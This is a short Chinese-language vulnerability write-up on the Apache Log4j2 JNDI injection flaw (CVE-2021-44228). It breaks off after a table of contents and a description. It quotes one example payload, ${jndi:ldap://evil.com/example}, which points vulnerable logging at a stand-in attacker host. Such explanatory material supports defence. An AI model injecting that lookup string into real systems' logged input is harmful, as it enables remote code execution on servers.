文章目录
漏洞描述
-
-
- 漏洞描述
- 漏洞编号
- 影响范围
- FOFA
- 环境搭建
- 漏洞复现
- 漏洞复现-反弹shell
- 参考连接
- 摘抄
-
- Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于
Java的日志记录工具。 - 该工具重写了Log4j框架,并且引入了大量丰富的特性。
- 我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。
- 该日志框架被大量用于业务系统开发,用来
记录日志信息。 - Apace在其2.0到2.14.1版本中存在一处
JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。
- CVE-2021-44228
- log4
